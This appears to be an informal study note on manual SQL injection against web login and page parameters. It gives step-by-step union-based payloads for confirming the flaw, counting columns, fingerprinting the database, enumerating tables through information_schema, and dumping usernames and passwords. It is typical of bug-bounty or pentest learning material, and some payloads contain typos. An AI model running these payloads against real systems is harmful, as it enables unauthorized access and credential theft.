First you need to know the basics of SQL go here ⇒ SQL Basic Commands ( using mysql ) To get SQL injection automated see SQLmap (Incomplete)
Basic :
%27 - ’
%23 or -- (space) ;-- or ;/* or ;// - for commenting out
always give a space in textboxes / URL’s after -- to comment rest
/**/ or + - for spaces
%20 - for space ( mostly used in Burp requests )
Step 1 : Checking If its vulnerable
If you see a login page or any page link which loads a different page do this :
Inject a Normal Statement
Inject a normal statement which website expects. Ex : 1
Inject a True Logical statement
Inject the same but followed by a TRUE SQL Logical INJECTION Ex :
1'+AND+1=1--if the website displays the same thing as first one that means it is executing your SQL and is vulnerable
Inject a False Logical statement
Now use the same input as used but instead give a FALSE Logical INJECTION like : Ex: ```
1'+AND+1=0--and if the website gives an error then it is vulnerable to SQL injection and if website doesn’t give an error its vulnerable to Blind SQL injection check below
Step 2 : Finding out number of columns and columns being displayed
To find number of columns
Use the order By command to find how many columns are present
Ex :
1'oRder+bY+1--and keep changing the number until the website crashes and you know how many columns are present
Ex : If website crashes at ordEr+bY+4 then it has 3 columns
To check which all columns are being displayed
We can use union select to find which all are being displayed
Ex :
1'UniOn+selecT+1,2,3-- ( assuming it has 3 columns ) and check where 1 or 2 or 3 are being displayed on your screen, because some columns are not set to be displayed on the user’s screen ( assuming 2nd column is being displayed )
If It dosen’t work :
-
Its probably using a different database and not mySQL to confirm if it is still vulnerable you can do :
1'UnIon+sElect+NULL,NULL,NULL--⇒ and the website should work normal -
to find out which SQL version it is running first find which column is being displayed by injecting strings :
1'UnIon+Select+"a","b","c"--( assuming “b” is being displayed somewhere ) do :1'UnION+SeLect+NULL,(Use all 4 version() commands)--⇒ refer to this cheatsheet Ex : version() works so website is using PostrgreSQL , so use the cheatsheet and use those specific commands
Step 3 : Finding all tables
Note : There is a table called information_schema.tables which displays all the tables present in the database
do : 1'Union+SeleCT+NULL,tabel_name,NULL+FrOm+information_schema.tables--
( Assuming we found a interesting table called users )
Step 4 : Finding all Columns in that table
do :1'UnIOn+select+NULL,column_name,NULL+from+information_schema.columns+Where+table_name='users'--
( Assuming we find 2 columns being usernames and passwords )
Step 5 : reading the content
to see usernames : 1'Union+select+NULL,usernames,NULL+from+users
to see passwords : 1'Union+select+NULL,password,NULL+from+users
If Blind Injection found :
Mostly injecting SQL statements will cause very minor change which is hard to notice see UDEMY-BUG-BOUNTY-ZSECURITY
If TIME-BASED Injection found :
Here unlike Blind there are little to none changes in the website